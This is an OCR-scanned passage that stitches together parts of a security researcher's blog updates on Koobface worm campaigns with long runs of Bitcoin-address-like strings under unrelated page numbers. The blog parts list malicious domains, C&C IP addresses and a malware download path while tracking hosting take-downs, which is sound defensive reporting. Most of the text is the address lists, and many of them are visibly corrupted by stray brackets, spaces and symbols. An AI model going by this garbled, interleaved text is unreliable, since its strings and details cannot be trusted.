&c fb=0 &c ms=0 &c hi=0 &c tw=0 &c be=0 &c fr=-2 &c yb=-2 &c tg=0 &c nl=0 &c 
fu=-2. 


UPDATE10: Two new Koobface domains, and a new redirector are in circulation across 
Facebook - rect08242009 .com (61.235.117.83) and pari270809 .com, which redirects to 
masa31082009 .com/go/fb w.php. The "[2]fan club" has also introduced updated the mal- 
ware - web.reg .md/1/[3]v2prx.exe. 


The domains, pari270809 .com, rect08242009 .com and masa31082009 .com are in a 
process of getting shut down. 


UPDATE9: Domain zadnik270809 .com - Email: baoyshzrcwmraq@gmail.com has been 
suspended. 
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2542 


18aPAWUjzRuFiNJTSLPgewpbtUMoobWyPn 
18aPPVutCFJT58FnbwCmjqkKUcDRRFMjwnf 
18aWRDBsGRb1pnkw88sqq]XgxqF21n61xS 
18aXTXjYtCBjmwjJRsyVHqdHZzyP7jj2pW5 
18AZ1n68VSjZNPd59GXWG6StGFA4wP2vto 
18AZ84HFW3Fi3ksb2d10DqYapM7DxZVCxw 
18azF2LoDZ9aRME3aTMK2DSAVgUWof4kLN 
18b36BZHYbuR7d8LvsdWjpQpjf9DtS3dPa 
18b4GasoSWa91s56xpasYJrAeDm4yb5xLa 
18B5hQ2DuxGzTCxNaXL2J3AsWX3FPPeMup 
18b6vE9SIkKXFKwWWkVdffFxWLKU7AmfV4nB 
18B77ZyyTTRgDa6zCQFPCTKFQKUggmafC4 
18bAChXdQPYoDsFfBcUysVvhg8ZruBdyGN 
18bAv5fZUURZxG3f4xKmL8vjrfafPPC8UF 
18BAwWRcCjCDEM7mXx3gDyUsLTgQrPm1x9}J 
18bELcqVGQcDTxb5AcMssGEgXfvJkQ4P2N 
18Bf7kD8NeJfmsBbKt8aTMi221R9PkSnyX 
18bhLmsqxYW4tiETSNGCA4LN135sjC2Ky9 
18BJ6LSWBm1pUalrerEwWnFfPSphnNDtpo 
18BJiTDWDSBrxwQN8Z]wyYzGirkQryY8Yz6L 
18BKE57r78nixPaVz8tXYSvV6kPpnXyLwe 
18BKUSAM2erPpSor1WpLk4nb7FVAt3qGcS 
18BLFxfg7DMqD379jVwEiLbpQdBkjBJsoz 
18BNz1XtbwhvC34VchWb8UdbCwHq9ZdW5t 
18BP6g8bQJoxU7HGFTxP8uhvNmDF7bAHhj 
18BqDsrPKxGMMUfnXEUU4rH5HSh27jZLZt 
18bscRlvnqURrUkxUCD/7sf7UigFodYfA4n 
18bsvym8pEQL8admLr6Y3dQo2bxQNcCnUE 
18BuaBTWWYsfQT6uGBJzTUs8k54HmkHzjS 
18BureiWYe6ZHn9Drict8QBDW2a4PY6V4R 
18bVTfchCfCTW19vVGS5tWi)Joif76Js1rQ 
18bW7gb1iryZehUZE513yW7DCTbWkFKWAC9 
18bWfqs9SXBT1fmql1ph77Zo06RACD7VaAfG 
18bx520iIDVSUcfFHHENTWuqvU9uUN2qT1UY 
18bXDZ4Mu6vDETF8vEMDxaDVWu2FdygSG3 


25393 


18c6gEFVW45U2wtVQu4c4DRY4VypXXPEze 
18C9607y1MoHKSh7w8FNveaPR34VJRt2GR 
18Cao0so5Sx7G91VTksxfQakqPwRKSWEUJK 
18Cast5Vn6KYdBeG5KtpM6r4UNqV9ukKtDE 
18ccUS95JRwGiZjbKu2Rmj2funbpsAbF7S 
18Ccx3xuQEe8ETYcrHXmhyF8x6XsE6ExCw 
18cdGyxYCYKFoJziSFQEPW4dtMMs9w3yrW 
18CdYW/7igPLcFDcthJKXhnrxFgeZYMnWPF 
18CDYWhrZGM3eSaCRqmt8JgoqBLvDGfEfV 
18cesiDA2FUNSAQUCM4wkndGTBZ4F2bFxK 
18cfEL3DrbY5S7xdHyf8sZ462kfgSd3PwR 
18cfoss;DMSrmtmeshBrbiFzzGSHQyaVoV 
18CGknpucxKKUgqqnMr5NBBBhVFjcIsVNVv 
18cHtdovzBx9NdTxAvReKecG2P7kCWcVgs 
18cihK5enfFFMeNecYhcaotBYhnGxJmTEG 
18CipKtEfY cqQJM6ZDKFh2uYc97k1luavb6 
18CMdxXiri5kUfezXmrQpqFR52n1vvEVGyY 
18cNYYyQ95fDgJ8a6BGHZKW8hmv71RWar8 
18cphp745arpzmUZMbNM372cFvAQwgYBK] 
18cPiTCiaNaDYoch5cMwJ6Lcv2yNJ39XQ9 
18Cro1YnjJaundJAkK9dWUmphNoGrmpnPU9s 
18CS102XNjDONhYEpdjfYprqm9ioCMds8u 
18CsUbgAJmr6XCkpkqwJ 7N8jhEpW4maA1M 
18cswDz6cGhVq8PYVBpXbREzY3hhtQQDMu 
18cWfBT34Qfc2LCa1lTb2M4Xgz31Uk5pPvG 
18cwh1jo9uKAbCEv7hy1UcXreaupnrmhZf 
18cyCdZ38d7xHKHCPjB61xKdAzerrdwoF7 
18cZEu9yWKr7Q9jzGkX67 1lig/JKQgGHUXKxV 
18D13z9XVbvngk8CaTkKQWUs4Wf6ktMM3zX 
18D3xa29MsMGScx3sTi8w3HSbEF3VCfFSN 
18D46FgpcpyYWgj29KNRpbhU4KwaqsGyBcu 
18dAWQTVLdj5Rz2VkipS9NRfFNNXVVNqXS9r 
18ddTrRPz3zy2TUT YelGTHP9gJLvPwVwC6 
18DgUSMUA8BzjpYN4Jdj4AhknhMSho8axA 
18dgzayRe3kNpxBEx5cc3qQ6yU1xHhqxwv 
25394 


18dhR39BMsCZZu93GM7mZknwsPo3rFK53A 
18DiFKky6zkohzsvJd9jvrWMMNYPpDAxGB 
18DJWRa99KtVqUMzTt36FLR1vaUDod5jPh 
18dkoaDRyi5Nqhka59Qd947T 7so8f4xXwPZ 
18DLdXSx7j5GdAkEhnEMkaceiuzzyvnRTZ 
18dNa61DhhxjhFYm2UVPa9vZwaqycmjLL6a 
18DnZb3tUgUhmjAasaiga3VmPrFkZ1HsfE 
18dQejWwstDsZZZHvQaw3zeBETITmoF9ztA 
18DQHax}J]xtkKHvPOGE6QMLZ9zTGCa287cf 
18dqU13BAjvenwbVLQeSGkGkXwCjgMCEnxX 
18DRBMbbjviL4J82GZ9m7bETyBYFyrJvvR 
18DS8iSqx2Cvhvqa6eWdYMclyuaURUy5rD 
18DsRo4MehHihquVo8h89WmzkK3SkybnEnq 
18dtTTPBSR89RWN9dUd9Db5L5kbjFPXPFB 
18duPRc7JPeixQBiJxsDuJzurt9WUYqBVA 
18e2gSKUDq49UVMJUCgsg3wMKpqkWTGcZx 
18E2KPc3Qsz1QntouPod3wzUwstrj9VHxF 
18E8x9N47sxz8dNiwWtZ5Dt]Jm3w8PFKY8S 
18EaLZY9GkK4Pnja6vninvvwokKsY66PAiK1 
18EbZTzrWoKjvEZFP2nsuaxZXk2DncTQIin 
18ee97992FJcz2aUg809KY1e5xUPfkvkCY 
18eEb40uYkd4zqXCM5g3nUCTt2G6NyFzy3 
18EEcBYViAenMK4r6rpaujK2 QUTGZenmxc 
18eeZbbwW8fsV60KkYN9CkfuXHHy8VXgNt 
18eFXVT8goCQPAvvTEzSJab5QB5pDdDLNx 
18eicAgGJ]ZWbW8bS2cs16A549XwexuMAMX 
18Eks1DNpXWX9BAuLyhfQG1MAFB3Y4wZ8a 
18empfp5THetvRHKCMZUNF5X7UvUUU7En} 
18EotgqQuXGRDb9rEbLqw4QGmp9J6F8ekn 
18epejFt7wAlqUrQPsFNt9KSwVo57mYd83 
18EQ9KS7bQMDWgEtyDrvUADKWcafwWagBC1 
18eqdP]TwpS8sdZfjdsLrtzwsY5qA46jxU 
18eQZCKUNKEn2nUAM8fts 7WbaVbjJRWQcn 
18eRx1VDaMaPvdNuKbogNxiiCRUEXHU5N7 
18esCZWU3phBzwR9KwmUDWNbitfayMKceS 
25395 


18etKT1LWepp2XAgRt2GdaYReuN7wgjwWLV 
18EudTbuTlyZ8uygCufkAvbC4 Xds9PNZvEN 
18EuKeEK5iuJ9qAppbcnY9xqLwMzkPX9Wt 
18EwSfCrhtydZa6uv7NfhR2TQUjJLb3nr9u 
18eYd2uSwZ8y7iUcDnWcmrizLEywyGBgQS 
18F386ur6u7GBUrxyGR4YUeAo2YGrooCyYu 
18F4SnhMV4BazMAnUi4GfkukSREbeKnXF7 
18f6aiiRV3HPYKnVaFwtjaGrQMn8RRUCZK 
18F6gdFSCKK4ZtM4YVy7DS1GRYWYYNGzTe 
18f7h8UHDcszkn3QTgh9Z7XTVGQUXPVdEj 
18F7Q245NG4VdrVMzK7h63Ex1vYDeMTFjr 
18f9xTmjY8AMm39ngnrbBvj9gtaGxhUJdf 
18fCkPf85UbQZFVWZNtUZY3e3X3Zi15NFy 
18fdCjCASMQN25EJK5BQZ73i0YHZvUHLya 
18feRA4UXe8vhDRKTrY6U9g9DuijtyeVz 
18FFRQ3EWGNucxNqyMYBybGtN1GxYQCf4w 
18FFVEBd68EQhLVRK66b6ydL1wK1hLHZFH 
18FHdJ7BA7fth8WNcqsVthmS63C4qAc8mg 
18FHRigQhymbo6YhHUCcXNzZBh38VsBReVWW 
18FJM31letGCih58PhfCSZWpYuUCJKCpSVw 
18FkEyFQDgaEXmnoBG9YRgP83kFUgtMrFA 
18FLW2Sqqr84TvMpxU3uBv]f4PwjZjDh6j 
18FPSenSW48KwZHDnjAtEjcalkJW2f7UWZ 
18fPtv9d4YJ5mgUCfJANbxWPJpJwmxXduaa 
18fqvbVD22BRWUZNQEGsm4XXRKXkrhN4K3 
18fTYCQEASi8A5Sq58e8JWG93pLezVedwU 
18fw4rCSDW9wFeYg5pdHmntcyYJkcVtrK3N 
18FWMatGu IcWJNg2UmYrnCAgqx88ZkT8VeF 
18fzni89q8QQrf7NsnbfzwmPawUba3j4GA 
18G36LpdWxaPcSSASYkxBMU6FaTJAcCA67 
18G3qau5eoFPUpwRoiUgfvel 7WcCdF9VQ8 
18g8PDe7A610EEDH3C3D8WJKSPbLHLUVPC 
18GaX9ZRy 7Jn6qhwZGUXrj3FDKiEnbxXY7U 
18gBhaRwBfF82daKhwdT XeTSBhVBPYe Icj 
18GDkbE1LoKyy3jCmktgT 7AbjvfmeR61vM 
25396 


18gdQw2ysCPLVZS5dXJXikfcFVS6ULK54A 
18GehPTLyG2uo0iFGd38GTpiXBxNDNZLirn 
18GfQdktHrK9Bg5KAfCaLZ3uB9Xu94KEbY 
18GG3uBSrDeMUbME6vgjQA3JsRTJzckVtQ 
18ggADNkHbmR}7CLcoPFt228y9WoPgseSg 
18gGwoyKzegnZ4QZxE1TJDtKLgs38Xsjn9 
18ghy3zuXPgLABZFqnmNZxEyKhF93zyxJ1 
18giPQ5BPa71EJ7a8Agy2JoiRVpa4mHoQ7 
18gJN2ZNVcKXwU5dbeEQCaeSm5CfzoA5P1E 
18gJ)qWkoo0488TsxjdgqooSKLNWQodHLpC4 
18GKDTpZnLjpMMLgXvbuShGpL9xAY3FXxt 
18GoJJpp7V83rNlexSth6xuEY6AmD1UHQn 
18GpHascF7KhSbrQ1lqmPT7k5xoK6QmNUgj 
18GQ7Q1d4xXBiyTd49E7csgM3b3LbBrGwYc 
18GqfCT2XyUghWAeDXwfwkyPfMuUoHD69a 
18GrrxDEygQDrjN25Fye6VXFQWtcDwuTvQ 
18gsBTMMxPuMLa3L8hPYXmMPSv7iWkhyFy 
18Gve929bfyWCvYVYYqj7o0tzXCnqNiNW9M 
18gvQz8hXwdzkMGVXcArcE7cvVc2TNBhgA 
18gx4LTL5JxjbRZefGKf4LKvhq3TPb98xR 
18gYkP6GtWwA1YDF8ZeN49BoMk43cCavoQk 
18gZ7zcrGRZinQHYbbfhmp7yCr4wt7c9ub 
18GZDbcEWxEVxcF3u8VjESE3b3axox]Jc5c 
18GZXyEhX3uEEuBLUpFm6Dx48g56aWvi2c 
18H2AiILEyaGNBHS4vsR85cK2kDLvxy28UW 
18H4tdfhEMgPug98pY6UDFTFMxTzqnUhhQ 
18h7SFkU97c9tWturVbLdGM3UzZFQZfxbto 
18H9rbV5zZ1AQ18TGKUf8EYUanntc4VEVsx 
18hcGVxJuEKSaYLzBs]pyTMdr14E4hNPpR 
18hDQSqKsRWnGdNe7NhobQjCpfaBdTQywb 
18hHEvVKtYMQweVbQhSFXHMZFn3qbktyXszU 
18hFiDL70q18ZnG4AFvdkRSPybRP9F22Lh 
18HhjitmBx4GfF7couj9EnmBPUsk5HSQ Tu 
18hHZomSVN71QkKZP87r42sN2GqRbwBv9cP 
18HKy3TW8jG9g2sdnpFxWMQcfHsuuM2Bvu 


25397 


18hMZXoeATcPKT6pWzSmS5yd77oLYpsrdE 
18hHNCx9cnBPSu6mNRetHnZCGY9eDf7fVP3g 
18hNwiTYZWACBL5akKVvFWkcCGjcDE7XiGv 
18HNZjTS8HUhJFFBVVQBJEjUjpJwx9rAho 
18hP4tbhC4HKRc6MkX8VuVpxP8EIPAXDjs 
18HP7Mb5dAm31SgVpQud497A89GmxAP4MM 
18hPNyBWYKnKh4PoLqQBxuegam3Jg9ZbDHW 
18hRexnWh9qHzyY8zRrUJCYTBszRKQQmo6n 
18HTFrtfJ/FsMUta7VhARcmMLKZCLhrjpRQMU 
18hTVB7orKB3LumoGYamhsbqUQA694JHLE 
18HU6fyvomAbcPQnGPKIcjHxyxCg7Kb75y 
18HuVAzwr8s4w9CcM1AqMMer]TvkuuCPYx 
18HvLDfWdAiwFPQLzZ3vQHcVrWCPCF6uUHEI 
18hwDxcKuHD9YIKkCRjnwwHaprjvqizhqeP 
18hx23ewFqMP4pQMReB3gQGqueoUwfs]s9 
18i2Z0HKX7y3sYkDZ5hw3ujJQA354KsDpE 
18ibaA7JkyHPqrUNLYNRHj6ACwaRDp9EhC 
18iBs3dieyqyoLXCA2aZ7AdFRnLhBKRgAq 
18icUWfyQxiLLazZ808LZEGouYxY5x8XJq 
18idcTbqhjHZbv78w4yryXHCfox6DXjbEX 
18iFQG6NUGZmeN9YSyoq7RHzws4f9mw4yYcd 
18iGUUoiliwdyK5LSF6xkdEvoNXKWeyhGm 
18iIHC7SbkKeXdGWrzzPBqMmHpktjfox1U9 
18iNEH86m5jJRB5rDkYGZrCetgoWxdXuwj 
18iJYJE51UifGdLqT3U1LgzkdLsThEwhYQ 
18iuW8UzzFPo5AMKhtKp2VjHxTRX6b8EXa 
18ivnp3TKtfgg)yLhP4nmQCr6sSUJwxMwm 
18ixJSUFPWQRJ3iXwsoZ9y1ZW)jGutsF79D 
18iyj2BNWon83XcsLEafrkKeQTJqjGJBXim 
18iyKQveSEtYwVVDLHcf3Nd5vory36eejk 
18iz7qpRphLsMfZdRQNtdTtgghUtL5QnFE 
18j3rHkKRIMUSWEM93kKRRDHoOPggQ8Gi76G6 
18)7PzZV2tBHNRWUMBFG913QQex8KEChmgq3 
18)9eJpKzzrELrvh5SjMZ8xJQCsi8t4J4k 
18jAGXQBMVbQ8m8dZcvYyGeliAcLnLtUvV 
25398 


18jaQEB64xciZqgPZYywBQw9bxDYzZJh8v5i 
18JAQx8eYp6LeLEfvbdM4vLyJPdry4t3p7 
18Jbd3ZeDSZ7hgAYXQk6c71YfJdLRApcG} 
18JBZqCcMxJL8pNZ2doPmyYcJslLygsZqg3 
18)DGg5DnGpXH1ZAk3B32ucVnoE3CP1j6z 
18JdPw8bSGdRaYxsycPgAT5a42AFL8THWM 
18jE711b9pGrTRrJNpV21RNcCGhDHXVp31W 
18jF1E1t4FB1i3QOSHRhTr8F3qbiYnSkUe 
18jfGZfnoC4P22d7f451ZsyJFokzxagKYK 
18JFTTBV2ixqCbYdJrl1CVWpDA8HXFQnTDk 
18jg1PCSmM5nQxqucMdCR5SGuxHZt9mV9IME 
18jgDkB71bXvzoPvvtWvWaHYjQuSQXBcZb 
18jHOHjS5Dun2RJMUQe5qcVCcDSuJQyhdbW 
18jhnnnfhkuY9JJZ2 poMgqLA2JSSwH935Ei4 
18Jiyg43S4ciSEmUleVcB5q5r6MrtZoevj 
18)MbeJxxgz5VnHnww2uZc6uYuZ4fxwCdS 
18jMCg81RHLXcpcSurYLpDUGru9ycxwAjx 
18jqpjR6q78E4WGEMTktZeLd2r8Skvg9yB 
18JrCco8yepuyZpNU2SKfidvRkv845jA9T 
18jSqmnJrQzwTjEJ3C3CGiIVnNHMJhcxw94d 
18jT1irnEy3fyb9voiBQCpySVXp6uG5CdpV 
18jTFljajZAmyqt39HXzQsbDqABX5Z1dEh 
18jWeKG8ir3gGxqozNJ2VSVfsSATCGH8Ew 
18K11xEkdCMku1s755b1DWUxP2Cj9Y48ZV 
18K8mzhJSvQcrRkK2mMWSVpcKWpszNq5si46 
18KamKrtZU4cCoEQmSx15rmW3uD4pDFZd9 
18KCJw4DiLVPuMu4ydrvjwvNbQqqrHV5Sp 
18KCTp2sjbQ2CTFdksmjVSkz7FaP7gPnfW 
18ke7Mn2NtKCkfZNHYraJd5Qzjq4irWbYz 
18kFzyW5MRwMwLtfmB9op2xrgcKn8NFrx5 
18kJ3rBRmM2MwsZHLxPxHdpuSqsokboh2A2 
18KLBkQjVjNbNfhNtXuNUBGsbe7bGFgGbp 
18knBDZJGy5fRRwabb1GaAbdfrcSo4rRAD 
18KNhkKHjfXAQDEE5i2Hp1a55BPsvbbYGEL 
18KoxE5QjASmtQoanjJa2AFphtjqwvyYjabx 


25399 


18KPuR36RIsSuyYmgF932SDk8Brzryezx5H 
18kSmMUcQtPStXkmzapiMvBsnV6LYPM9AR8 
18Ksoyb9Gs7nNzvKgnW5VDFSKkVC9yTWxXi 
18kTV8QG7ir9RscfXsS6WQvLKg4YWdM1Bhw 
18KU9qgnTPGH4Q7Vw3RweVikkRNSeeNXqD8 
18kUfSLATDf1405yzP6BLunBSixhQgTQgo 
18kugvZngC5xwtXB5DzDmRqaqmg61LxxE7 
18kVHAh8QQcvegfGTMhM3RRK3qjUnMwsDY 
18kWCKp1jPMjsfu6cCLQitUZ3vkKABWehTV 
18KWms5LRAE6Zb4w1gH1zFuWfWGLXuUbTG 
18kx8YdV1Znzt3wF3SfhcBrxreMaWwbgly 
18KyX2KQNZZGibgG5qd2Ac8M8gd5kCEiaY 
18kzdteS5PLdn4ewsUQjH71XEEH1cApcdP 
18KzisLRS8RoJn48f6XGLC9XD529iAand5t 
18KZWKQy3Q15TCDTF6x8fZycicC9744zPj 
18L4XCdenmCueceCCLpJx4Tkyzm9fGQuV6 
18L51i544yjaXgdHvrMmUiocTV11yNcQbC 
18L5ghyFgX6wasFuRHeZtx3ilT1Xn1Myjd 
18L7RyCubHdouDmsiMHn5QP85qiEWzmpwWj 
18L8aPcv6gBvyNiyswia8Bnyg5VGrjfCcz 
18LakQWpFBLXaBAVtoH3UWZxxSV8Cix5J4 
18LcoiDwMo5tDZPXnXJAJiFUOAUK2V7PWc 
18LeP1CvUxjdJScYjgvZvBYPw7nSrDCZcw 
18LmMYhtBkDzQPemy1aRe3FveXNtbqB9Pw6 
18Ln4prDxBQE3Pn9cfvaSYwZ2c9pWWe65ur 
18LpLNG42mhrBMngPDr39P93ye6Xm65AUL 
18LPXP4XKSUD6vuqKJaPDJWUyRdksrZ7uw 
18LWbozgE3XqfAe9F5Hi890hSvFdLSoW3M 
18m8d4xNv86U9ehNPDFDEe4pvYwh1cHGYF 
18ma8XS2Y3vXX6rSAUDxG2WU9xMZb7KGdH 
18maXCfxubuPskCV6fFygskd5FrvUjNH6P 
18McEmDPuNS6X60d3ZXH5QLQaS62i9WtYR 
18mMCkYSN9yQu8WwOWWVEPbed 7gip35uftkKXx 
18mDV5s57rEbg4Q8fabR3ff47e6y2LSEV9 
18MezVcSS99iB1ZAowjT4zZNApRjJaultCDy 
25400 


18Mfsc5RVbzij1l1kew5HFg5nxdkDLd6knNp 
18MGMy TsWWt8FCLEqpwiy11Q1cBC1mMjkM 
18Mh9rpjTSHFUHCwPctWz62JWuj4JEh4mE 
18MhAc2jvX5qBstufeCxt3Sxwjihq45q9L 
18MhWuTWob27Vgm8wbwiNdLrnZN9kbeoAe 
18mikmUC6bBZpJANhjC22qGwhmDjHfMetb 
18mK2prjL1zWtBkoyUjykARqk3LV7QCvT8 
18mPyrFZFZBvoAP9HWVRPbKuUATKpyeMoEa 
18mr6gURYHZnjJBWYFyiY 7rDoFzUkppb2tr 
18MU41larvT7XKQCpThdb6RWWK5kuXt4ZHB 
18MUDcTHXNR6QZTJbQo5xFfdgTJ8YuMcje 
18mWD2NjTryQpbK8sjmY80vGFEv7hKsZys 
18mWpTuUPIZXu8MxRzZwNfKv5 7DQDfJ9azK 
18n1luKbEojgJK4A4vEUjtQ|/LVBdRsqdFn9 
18n2sd5w23QB8LskhwQUFXN6nsw6sZsxUA 
18n34d5QPRmjvbP3tTbd69LqUDKbdAjTo 
18n3CPpz1dQkeXicDPr16s91sT2pM74Npp 
18n3qwnoZQrsz96BhE2fWFjb3gSm11C22w 
18N5nq3tXnvSjZUHDV3Djxis2kD6zqjNjx 
18NAefVxGGH2J2VyviumtexBb7Cy5X3iT8 
18NcbSWtr4ubtXzZVA1vSk63zcMjMPwy2E 
18ND7eMZX28aQmrjWv1C7s92twqM9uYXeZ 
18NdB2Sm2byy7X617h2d1xeDjy6o0dZhy7S 
18NfxyUqMpFPjkzK2BpwVWogspKX2Z8wie 
18nGMJn9e614gk7LcTn5sbQYMAKx6rfrav 
18NhCrHnwwxdpt6PoQLeerpD5wkEBc9dAB 
18nJt94tm4LKrUnWNpM8qXD50XDQBF4thi 
18NK3QrUxr726ZhmagAQdpX7obUjV9IJWD7 
18NKZFIWMFEKkth5UN5X8sXCqZjgopJU8T 
18NMAeDAo]3JciMBPUXyxmcvwn]jiJ5bNq 
18nojCNorsmgqy42Qt6LTMx1hzZxb6dcab 
18NpkzxvzviMWGYXJn9MCPUuRKiLKSjutY 
18nPXmJJy938fekWdGyPS17H6DaiJHTMrn 
18nQ4LCCjQiaYkQy2vi3yoDHYUQMHxCiRcm 
18nqWpyfSBwRFe4ocZNj3bKCACaSgon957 


25401 


18NsLS18Q7rFys7aAJDQBQ4pR7YrtRvwpn 
18nSqEAPvG2eBUhdx3rUnR7ANI1PVjb6jq7 
18nuhhttzRZUaquSA2wv75XanvEM3RD1Er 
18Nur2ViSn74Lhr2YMpVBqdkK19vWeUw3o0 
18Nx8pjjlc2yxg28cB3EayJDoJQiGHD4NT 
18ny9vRFPaTUVL3JyX2sqCbaM519wb2HTG 
18nYi7tFNRYhyLgWwYgKSrH8KTHFcTm1lyx 
18NyorjD1vtWcBi45E9P3yzL6jES5Xt3fb 
18NznwgqnT9y8eV7ysqoYQ89PLmiqNXhXPP 
18nZpYvxU4QzW7cDtRJhzBq6erSrfxNSmk 
1802G1Xs8GHeQJHgSKquB7gFturYH17iPq 
1805JTAXwrfkKvuiamk6ifdCANJobnYwlh2w 
1807XZ4uJg2beN 7oy3qHorkdYKuPGVqG9M 
1809XkkPf7MBxmxAeA8SvrwvRnLyDUrX3x 
180Dnco7vqvCKwLxXY7g5L7ZECyK6aY5TSB 
180FFfNPqnz2yzr6bWVYLOMWAbBWGpBFs3G 
180FZVWZuTgB5mbdzkfAAS8ED7Rmnéghpp 
180hM1kSpugr4G3AQqm8FcUrzEij6dtup) 
180kLePkkxSM3bNofYXY4uw3zZ479TcAyz 
180mkWxqmBzt9VfxekarhxXjAXhSgCAw6Rm 
180nwmsPFeyJjGz1MenWi5CDC6yxwUy5gk 
180Pig6UZRKHQoB7mfm2J9E7AZWgPt3]dN 
180SGEpbUrWAfvXiynWUYqjp9v2MP9TLip 
180szvJVAnnuwPejfAaLc2uZq8TZrJws99 
180uGiXurRvLWwwQqsSvGfiMzFStxjcghSx 
180v1CSke9CkSPUqwbfmFi5dR6P4bv22zc 
180vGCN1715DBVTGniWF8Hdt85shRfqiRh 
180VSN8kN6yQwCUUfhFHCwXfHu7vMQ1WKw 
180w9ccvV6YnNWKpaqjJG5xxDxSYe285zEjZm 
180yR5npn1xBzm1zzopSEQUK1XM7NVwWN1M 
180ZKKZFHHfwJem2cmnpBikRvnhLvajY3y 
18P1UsAnki4mtjuEp6MLaaRxvraqgaVyiji 
18p2yQ9g3DeAiIGBNMWkEhb56QxnhosFbiBh 
18p5ifEFwrgZGkUU3uRZKiJ6qdhF3Aaieb 
18P5UpeD5Dn9F9r2G79KXzwWvdE9Jmxvx 
25402 


UPDATES8: Koobface reactivated itself once again at 61.235.117.83 - [4]China Railcom Guang- 
dong Shenzhen Subbranch - a well known Zeus crimeware C &C, which is also apparently used 
for automatic hacking of third-party sites through [5]compromised FTP accounts. 


The gang has also introduced a new domain, used exclusively for Facebook campaigns - 
zadnik270809 .com - in particular zadnik270809 .com/youtube.com/w/?video which loads 
zadnik270809 .com/youtube.com/w/ups.php and redirects to a well known Koobface redirector 
kiano-180809 .com/go/fb _w.php. 


Zadnik means a**hole. Domain suspension and IP take down are in progress. 


UPDATE7: Earlier today, TelosSolutions confirmed that "this customer has been removed 
from our network". Great news taking into consideration the fact that Directi’s Abuse Desk 
has also suspended boomer-110809 .com, as well as upr200908013 .com. 


The Koobface gang responded to the take down action by once again moving to China, 
[6]61.235.117.83 (China Railcom Guangdong Shenzhen Subbranch) in particular. The IP has 
been taken care of, with all of Koobface campaigns once again in an "inactive stage". It’s 
worth pointing out that kallagoon13 .cn and allavers .org are also parked at this Chinese IP, 
with [7]both domains clearly involved in [8]Zeus crimeware campaigns. 


UPDATE6: Following the 24 hours downtime, the Koobface gang has found a new home 
online, courtesy of Telos-Solutions-AS/Telos Solutions LTD, with an ongoing migration of the 
Koobface C &C and campaign domains to [9]91.212.127.140. Take down activities are in 
progress. 


UPDATE5: Oc3 Networks & Web Solutions Llc abuse team took care of [10]67.215.238.178. All 
of Koobface worm’s campaigns once again redirect to nowhere. 


UPDATE4: Koobface has been kicked out of China - again - courtesy of China’s CERT, 
and is no longer responding to 221.5.74.46. This is the second time that [11]the Koobface 
gang is using the same IP for its central campaign domains, clearly indicating an ISP which 
"reserves its right to offer them services in the future once they stop receiving abuse notifica- 
tions". 


2543 


18p7h7PFPTQK3XGmK1b2db8yHZSXB2yJeB 
18pbiFBq8rAZoGiD1Y4Bc7KVXtQ2muWq2A 
18piQW88Q6pqw4wbqN6gsGLRd9zp9mySxz 
18Pk328zZRZaQXqZWMubFfKt5S VWG9FK7Jfq 
18pLFQ}JyeJ9b9GnRTTbr29xbQyp|nbxQK7 
18PmflNrn6RKdU4EuqzDRJgwWFCKx649W7 
18poeV1ScnrfHec9nQu2mPBax6Xa5QDfPS 
18PPd9G5AWCubPi1zKrKGskjHqg9QMa4UmR 
18ppovw3Zdb8YMt3SazCxu7dHAuBTE3Qfa 
18PrWt2KfwC9XqymMMRYXNcG19WD5T57NZ 
18pSab3rAwVbFHuwQjKyPxDnZyANpiNLCK 
18PSASekeX3MwYcHUcft59YwHULvwuDmsi 
18PTxFNuxq4D6RbVQtNtc32EmihBEBRebj 
18putyKS1MXuoDVXfVpPqXxXpPcMViyaTZLx 
18pVDHhc3DB6b2vE9GqdjWAH2HTyxBP4 7} 
18pVUjRWpy2ZJoainSJZHb3bVfrdA9MTpoy 
18pwmSm4CNdM2U4Rj2Hcbg357ewgBDM3KL 
18Px21tjrgXjbjuMQYrNLRZcPVEUuRnUWrP 
18PYtv92LH48DuPdWTS9pT6dE8smsrTfD4 
18q1W43ENdWsdizDDpAQgnu6fpEEDWM4NR 
18Q6BfnYmBhVfthh7KobCPwubKNBaZSpCWm 
18Q8yCnGxg5eAckYis2jXECfHphu9PWIYH 
18qaBMJpMrKFHnGTPfQA2mshHgQaw5Gadd 
18QC24pDnSHBIMvyyUhY99ix6KLAupvKixE 
18qcoMSkUiUw87u58eHWLq8YUH89uUFUJV5 
18qdQiDYdAKtZJ2BfgPftH4C7tUbWZQEvY 
18qfivVCQzRmRudEtec9xfBxKmMBIYEhVdVTH 
18QFRahmZg1msGsZCMqgp2i87cqM5pFoxh 
18qjcEidGoEBqg1ly464gQrqxxymZYmw4Sk 
18QL8R8mvBlqrlqkK7a8BKoBL1Wc6HdfVt1l 
1L8QMjvvfbXxXj872Fj/8sPJHdXYp4cRhfwNtb 
18qmtfzwLHfsLptnw8k6pNdYY4Y2jpxSmZ 
18Qo2WipD3H9nkRn5dgofdpfbyzZjSQwcbZ 
18QonP6QWHGMOoYES5X24u6EFaWwrt6KEMBNy 
18QP5ej6HjxCTZjEGRYGsQxLKTKJE9ASVB 


25403 


18QpqxTwepNFT339N1WqHp2phPZ2p8kpFF 
18qq2kdeWcTkugWNFtn6V8CojVvw77LiBd 
18QRrqynmEy6rB9RQnwctgYu8WGzd5RT19 
18qt8bAjiTNEJaU9jFovAoLF8gxVSh8bbH 
18QtjQ5bUFGL8Yj6pr8KKYHyVma9LnamRC 
18QTXYUJiBRUEah4RXnGZgHSey6DEhzcio 
18QUdNBhegfnyJG9MzXQJs4MGcuZQpYnrC 
18QuEn6pdFUcAVxyBXtEVEorrukBuMDDB}) 
18qUk8J11WTr7ZaJPsqFxwupw39BkBEGaqi 
18qvDMhjYMRNpux2APxiwk6fwt7w3Bupyb 
18QWo3hT78vAZYs]pf9v28kGvvPeV8ymJM 
18qWtB4EaUDoqYQYpwkoMxXxXJcps3JVogaV 
18qyd2L7VYMP4Rnc3JVNJXPPzaqfsvcDY7i 
18r1gj1jC1DC3cyJrxmxPxTEVDg7DYoCP6 
18r2kwjsaED2hbzJmDmCLrx5D9Suk2Q9Ca 
18RacBboxXj2PZ6qbPQxLhoYp33K2fCJsFE 
18RBK1klooeaTA4cyqMvc5Ln2S1tFsPRko 
18rewKLBYumG6A5ye9iVGtt4txrSBry26t 
18rfLlomPgXLYRCMGeTuHovvbwkhWoGBHL5 
18RfmdjJaT5iVbYUUMCB3wNLuYxiBZHy9MK 
18riKRr3T5G26ipeyRjYUhdco6pZEwVXFc 
18RiIW7widQLZGaiBUMrWrr]qmxHHE7SfFc 
18rJz8xjzUYpTDMkJYmeBrHQ5H8ssE2pCY 
